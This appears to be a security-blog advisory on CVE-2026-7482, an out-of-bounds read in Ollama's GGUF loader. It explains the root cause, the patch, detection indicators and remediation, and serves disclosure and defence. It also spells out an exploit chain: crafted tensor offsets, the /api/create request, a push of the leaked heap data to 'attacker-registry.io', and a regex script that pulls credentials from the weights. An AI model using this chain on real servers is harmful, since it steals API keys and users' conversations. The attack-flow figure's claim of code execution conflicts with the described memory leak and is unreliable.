CVE Analysis 2026-05-04 · 9 min read

CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory

A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.

#heap-buffer-overflow #out-of-bounds-read #information-disclosure #gguf-parser #arbitrary-memory-read
[Figure: Attack flow, CVE-2026-7482 (memory corruption). Stages: Attacker (remote, unauthenticated) → Memory corruption (CVE-2026-7482, cross-platform, critical) → Code exec (arbitrary code runs as target) → Compromise (full access). Status: no confirmed exploits.]

Vulnerability Overview

CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and size that together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a Read() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocated slab, and the over-read bytes — which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation — are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.

CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.

Affected Component

The bug lives at the intersection of two files:

  • fs/ggml/gguf.go — parses tensor descriptors from the GGUF binary, populates GGUFTensorInfo structs with attacker-controlled Offset and Size fields.
  • server/quantization.go — iterates parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.

The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.

Root Cause Analysis

The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts all of these fields unconditionally.
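To make the descriptor layout concrete, here is a minimal Python sketch of reading one tensor descriptor. It assumes the little-endian GGUF v3 encoding: a uint64-length-prefixed name, a uint32 dimension count, uint64 dimensions, a uint32 type, and a uint64 offset. The function name parse_tensor_info and the returned dictionary shape are illustrative and not taken from Ollama's source.

```python
import struct

def parse_tensor_info(buf: bytes, pos: int = 0):
    """Read one GGUF tensor descriptor starting at pos (hypothetical helper).

    Returns (info, next_pos). Nothing here checks the values against the
    file size; every field comes straight from the file.
    """
    (name_len,) = struct.unpack_from("<Q", buf, pos)
    pos += 8
    name = buf[pos:pos + name_len].decode("utf-8")
    pos += name_len
    (n_dims,) = struct.unpack_from("<I", buf, pos)
    pos += 4
    dims = struct.unpack_from(f"<{n_dims}Q", buf, pos)
    pos += 8 * n_dims
    ggml_type, offset = struct.unpack_from("<IQ", buf, pos)
    pos += 12
    return {"name": name, "dims": dims, "type": ggml_type, "offset": offset}, pos

# Build a descriptor like the one discussed in this article and read it back.
name = b"exploit_tensor"
raw = (struct.pack("<Q", len(name)) + name
       + struct.pack("<I", 2) + struct.pack("<2Q", 1, 4096)
       + struct.pack("<IQ", 0, 0x17F0))
info, end = parse_tensor_info(raw)
print(info, end == len(raw))
```

The parser returns whatever the file declares, which is the point: any range validation has to happen as a separate, explicit step.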

// fs/ggml/gguf.go — reconstructed pseudocode (Go logic rendered in C for clarity)

typedef struct {
    char     name[MAX_NAME];   // tensor name string
    uint32_t n_dims;           // number of dimensions
    uint64_t dims[GGUF_MAX_DIMS];
    uint32_t type;             // GGMLType enum (quantization format)
    uint64_t offset;           // BUG: attacker-controlled, never range-checked
} GGUFTensorInfo;

int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    uint64_t n_tensors = ctx->header.n_tensors;
    uint64_t data_offset = ctx->header.data_offset; // start of tensor data region

    for (uint64_t i = 0; i < n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        // reads name, dims, type, offset from file — all attacker-supplied
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: missing bounds check here
        // Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
        ti->data = file_buf + data_offset + ti->offset; // raw pointer arithmetic on heap buffer
    }
    return 0;
}

When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:

// server/quantization.go — WriteTo() reconstructed pseudocode

int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
    size_t nbytes = tensor_byte_size(ti); // computed from dims + type, not file bounds

    uint8_t *src_buf = malloc(nbytes);    // sized to declared tensor, not remaining file bytes

    // BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
    // If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
    ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);

    // Over-read bytes from adjacent heap regions are now in src_buf
    quantize_tensor(src_buf, nbytes, ti->type, dst); // serializes oob bytes into output model
    free(src_buf);
    return 0;
}
Root cause: gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer, allowing WriteTo() to subsequently read an unbounded number of bytes past the end of that allocation.
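
The read length in this path is derived only from the descriptor's shape and type. The following Python sketch shows that derivation for a few GGML types; the table and the function are a simplified illustration (real loaders cover many more types and check divisibility per row), not Ollama's implementation.

```python
from math import prod

# (elements per block, bytes per block) for a few GGML types.
# Type ids follow the GGML enum: 0 = F32, 1 = F16, 2 = Q4_0, 8 = Q8_0.
BLOCK_LAYOUT = {
    0: (1, 4),
    1: (1, 2),
    2: (32, 18),
    8: (32, 34),
}

def tensor_byte_size(dims, ggml_type):
    """Bytes implied by a descriptor's shape and type (illustrative only)."""
    elems_per_block, bytes_per_block = BLOCK_LAYOUT[ggml_type]
    n_elems = prod(dims)
    if n_elems % elems_per_block:
        raise ValueError("element count is not a multiple of the block size")
    return n_elems // elems_per_block * bytes_per_block

print(hex(tensor_byte_size((1, 4096), 0)))  # 0x4000
```

Because none of the inputs depend on how many bytes the file actually contains, the result can be made arbitrarily larger than the data that follows the header.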

Memory Layout

The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.

HEAP STATE — BEFORE TRIGGER (simplified arena view):

 [  gguf_file_buf : 0x1800 bytes  ]   <- file_buf; legitimate tensor data ends here
 [  goroutine stack frame (G2)    ]   <- concurrent user session, contains system prompt + API key
 [  env slab: OLLAMA_API_KEY=...  ]   <- os.Environ() result, interned on heap
 [  model context scratch buffer  ]   <- KV cache, may contain prior conversation tokens

MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
  ti->offset = 0x17F0     // 16 bytes before declared end of file_buf
  ti->dims   = {1, 4096}  // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
  ti->type   = F32

READ OPERATION AFTER PARSING:
  ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
  effective read: file_buf[0x17F0 .. 0x17F0+0x4000]
                              ^^^^^^^^^^^^^^^^^^^^^^^^
  file_buf ends at          : file_buf[0x1800]
  over-read begins at       : file_buf[0x1800]  (+0x10 bytes into read)
  over-read length          : 0x3FF0 bytes      (~16 KB of adjacent heap)

HEAP STATE — AFTER READ (src_buf contents):
 [0x0000 – 0x000F] legitimate tensor tail bytes      (16 bytes, in-bounds)
 [0x0010 – 0x0FFF] goroutine G2 stack spill region   <- system prompt, session tokens
 [0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-...             <- environment variable slab
 [0x2000 – 0x3FEF] KV cache scratch (conversation)   <- prior conversation context
 [0x3FF0 – 0x3FFF] partial next allocation header

 src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob
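
The figures in the layout above can be reproduced with a few lines of arithmetic. This Python sketch splits a read into its in-bounds and out-of-bounds parts; overread_window is a hypothetical helper name used only for this illustration.

```python
def overread_window(buf_len, read_offset, nbytes):
    """Split a read of nbytes at read_offset into (in-bounds, out-of-bounds) byte counts."""
    in_bounds = max(0, min(nbytes, buf_len - read_offset))
    return in_bounds, nbytes - in_bounds

# Values from the layout: a 0x1800-byte buffer, an F32 tensor of 4096 elements
# declared 0x10 bytes before the end of the buffer.
in_bounds, leaked = overread_window(buf_len=0x1800, read_offset=0x17F0, nbytes=4096 * 4)
print(hex(in_bounds), hex(leaked))  # 0x10 0x3ff0
```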

Exploitation Mechanics

EXPLOIT CHAIN:

1. STAGE MALICIOUS GGUF
   Craft a minimal valid GGUF header (magic 0x46554747, version 3).
   Declare one tensor with:
     - name:   "exploit_tensor"
     - type:   F32 (0x00)
     - dims:   [1, 4096]  → nbytes = 0x4000
     - offset: file_data_size - 0x10
   Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
   Total crafted file size: ~512 bytes.

2. TRIGGER LOAD VIA /api/create (no auth required)
   POST /api/create HTTP/1.1
   Content-Type: application/json

   {"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}

   Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
   quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
   before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.

3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
   quantize_tensor() processes src_buf as F32 weights.
   Quantization to Q4_0 is lossy but the output still contains recoverable signal
   from the over-read region — environment strings survive quantization as
   near-literal byte sequences when they fall in the low-variance tail.
   The output model is written to Ollama's local model store as "exfil-model".

4. EXFILTRATE VIA /api/push (no auth required)
   POST /api/push HTTP/1.1
   Content-Type: application/json

   {"name":"attacker-registry.io/user/exfil-model:latest"}

   Ollama uploads the crafted model (including OOB bytes in the weights blob)
   to the attacker-controlled registry over HTTPS.
   Attacker pulls the model, extracts the raw tensor data layer, and scans for
   high-entropy strings matching API key patterns, env var syntax (KEY=value),
   or UTF-8 conversation text.

5. REPEAT WITH TIMING
   On a busy multi-user instance, loop /api/create requests with varied offsets
   to harvest different heap regions across goroutine generations.
   Each iteration yields a fresh 16 KB window into the heap arena.

Because F32 quantization to Q4_0 maps 32 floats to 16 bytes + a scale factor, low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.
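
As a rough size check on the paragraph above, this Python sketch computes how many bytes a Q4_0 encoding of an F32 buffer occupies, assuming the standard block layout of one fp16 scale plus 32 packed 4-bit values. The constant and function names are illustrative.

```python
Q4_0_BLOCK_ELEMS = 32      # float32 values per block
Q4_0_BLOCK_BYTES = 2 + 16  # fp16 scale + 32 packed 4-bit values

def q4_0_output_bytes(f32_input_bytes):
    """Size of the Q4_0 encoding of an F32 buffer (whole blocks only)."""
    n_floats = f32_input_bytes // 4
    n_blocks = n_floats // Q4_0_BLOCK_ELEMS
    return n_blocks * Q4_0_BLOCK_BYTES

print(q4_0_output_bytes(0x4000))  # 2304
```

Each 128-byte input block becomes 18 output bytes, so a 0x4000-byte read is stored in 2304 bytes. That ratio bounds how much of the over-read region a single quantized tensor can carry.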

# Proof-of-concept: scan exfiltrated weights blob for credential strings
import re, sys

PATTERNS = [
    rb'OLLAMA_\w+=\S+',
    rb'sk-[A-Za-z0-9]{20,}',
    rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
    rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]

def extract_tensor_data(gguf_path):
    """Minimal GGUF parser — jumps to tensor data region."""
    with open(gguf_path, 'rb') as f:
        raw = f.read()
    magic = raw[:4]
    assert magic == b'GGUF', "not a GGUF file"
    # locate tensor data offset from header (simplified)
    # real implementation would parse kv metadata length
    return raw[0x200:]  # approximate; parse properly in production

def scan_for_secrets(blob):
    hits = []
    for pat in PATTERNS:
        for m in re.finditer(pat, blob):
            hits.append((m.start(), m.group()))
    return hits

if __name__ == '__main__':
    blob = extract_tensor_data(sys.argv[1])
    for offset, secret in scan_for_secrets(blob):
        print(f"[+] offset=0x{offset:08x}  secret={secret[:80]}")

Patch Analysis

The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:

// BEFORE (vulnerable — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: no bounds check on ti->offset or tensor_byte_size(ti)
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// BEFORE (vulnerable — server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length


// AFTER (patched — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
        if (tensor_end > file_len || tensor_end < ti->offset) { // overflow guard too
            return GGUF_ERR_TENSOR_OUT_OF_BOUNDS;  // FIX: reject malformed descriptor
        }
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// AFTER (patched — server/quantization.go WriteTo):
uint64_t max_readable = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
    return ERR_TENSOR_TRUNCATED;  // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);

The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.
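
One way to avoid reasoning about wraparound at all is to phrase the bounds check with subtractions only. The Python sketch below emulates uint64 arithmetic to compare that form against the three-term sum in the C rendering above; it is an illustration under those assumptions, and the actual Go patch may be written differently. Both function names are hypothetical.

```python
U64_MASK = (1 << 64) - 1

def tensor_end_wrapping(data_offset, offset, nbytes):
    """Emulate the uint64 three-term sum, including wraparound."""
    return (data_offset + offset + nbytes) & U64_MASK

def tensor_fits(data_offset, offset, nbytes, file_len):
    """Subtraction-only bounds check: no intermediate value can exceed file_len."""
    if data_offset > file_len:
        return False
    remaining = file_len - data_offset
    if offset > remaining:
        return False
    return nbytes <= remaining - offset

file_len = 0x1800
# Descriptor from the memory-layout example: rejected.
print(tensor_fits(0, 0x17F0, 0x4000, file_len))    # False
# A declared size near 2**64 wraps the three-term sum back to 0x10, which is
# neither greater than file_len nor less than offset, yet the tensor cannot fit.
huge = (1 << 64) - 0x20
print(hex(tensor_end_wrapping(0x20, 0x10, huge)))  # 0x10
print(tensor_fits(0x20, 0x10, huge, file_len))     # False
```

The second case suggests that a single tensor_end < offset comparison may not cover every wrap of a three-term sum, which is why the subtraction form is often preferred for this kind of check.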

Detection and Indicators

Log-based detection: A single /api/create → /api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.

INDICATORS OF EXPLOITATION:

Network:
  - POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
  - POST /api/push to a registry not in your internal namespace
  - Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
    immediately following a /api/create call

Process:
  - ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
  - Unexpectedly large RSS growth during a /api/create call for a tiny model file
    (crafted file is ~512 bytes; RSS growth of several MB indicates OOB read)

YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
    meta:
        description = "Heuristic: GGUF file under 4 KB (possible crafted minimal model); does not itself verify tensor offsets"
    strings:
        $gguf_magic = { 47 47 55 46 }         // "GGUF"
    condition:
        $gguf_magic at 0 and filesize < 4096   // legitimate models are MB+; crafted is tiny
}
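
The push-destination allowlist mentioned above could be sketched as follows in Python. Everything here is an assumption for illustration: the (path, JSON body) input format stands in for a reverse-proxy log and is not something Ollama emits, the allowlisted host is a placeholder, and the registry host is extracted using the Docker-style convention that a first path component containing '.' or ':' is a host.

```python
import json

ALLOWED_REGISTRIES = {"registry.internal.example"}  # hypothetical allowlist

def push_registry(model_name):
    """Return the registry host of a model reference, or None if no host is given."""
    first, sep, _ = model_name.partition("/")
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first.lower()
    return None

def suspicious_pushes(requests):
    """Yield /api/push targets whose registry host is not allowlisted.

    requests is an iterable of (path, json_body) pairs from a hypothetical
    reverse-proxy log.
    """
    for path, body in requests:
        if path != "/api/push":
            continue
        name = json.loads(body).get("name", "")
        host = push_registry(name)
        if host is not None and host not in ALLOWED_REGISTRIES:
            yield name

log = [
    ("/api/create", '{"name": "exfil-model"}'),
    ("/api/push", '{"name": "attacker-registry.io/user/exfil-model:latest"}'),
    ("/api/push", '{"name": "registry.internal.example/team/model:1"}'),
]
print(list(suspicious_pushes(log)))
```

Names without an explicit host go to the default registry and are not flagged by this sketch; a stricter policy might treat those as external as well.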

Remediation

  • Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
  • Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
  • Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
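  • Sandbox the Ollama process: run it under a dedicated UID, confine file access to $OLLAMA_MODELS with a path-aware mechanism such as Landlock, AppArmor, or a mount namespace (seccomp filters cannot inspect the path argument of openat), and block outbound connections from the process except to known registry hosts.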
  • Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.
CypherByte Research
Mobile security intelligence · cypherbyte.io